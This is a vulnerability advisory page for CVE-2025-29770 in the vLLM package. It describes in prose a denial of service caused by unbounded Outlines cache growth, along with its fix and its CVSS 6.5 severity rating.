PyPi: Vllm

CVE-2025-29770

Safety vulnerability ID: 76302

This vulnerability was reviewed by experts

The information on this page was manually curated by our Cybersecurity Intelligence Team.

Created at Mar 19, 2025 Updated at Oct 04, 2025
Scan your Python projects for vulnerabilities →

Advisory

Affected versions of the vLLM package are vulnerable to Denial of Service through unbounded filesystem cache growth in the Outlines guided decoding backend. The outlines_logits_processors.py module fails to limit the size of the grammar compilation cache, allowing unlimited cache entries to be created.

A remote attacker can exploit this vulnerability by sending numerous requests with unique schemas through the OpenAI-compatible API server, causing each request to add a new entry to the cache, resulting in filesystem exhaustion and service unavailability. Additionally, the cache was enabled by default without administrative controls, making all V0 engine deployments vulnerable.

The vulnerability was fixed by disabling the Outlines cache by default and introducing the VLLM_V0_USE_OUTLINES_CACHE environment variable for administrators who wish to explicitly enable it. The V1 engine is not affected by this vulnerability.

Affected package

vllm

Latest version: 0.11.0

A high-throughput and memory-efficient inference and serving engine for LLMs

Affected versions

Fixed versions

Vulnerability changelog

This vulnerability has no description

Resources

Use this package?

Scan your Python project for dependency vulnerabilities in two minutes

Scan your application

Severity Details

CVSS Base Score

MEDIUM 6.5

CVSS v3 Details

MEDIUM 6.5
Attack Vector (AV)
NETWORK
Attack Complexity (AC)
LOW
Privileges Required (PR)
LOW
User Interaction (UI)
NONE
Scope (S)
UNCHANGED
Confidentiality Impact (C)
NONE
Integrity Impact (I)
NONE
Availability Availability (A)
HIGH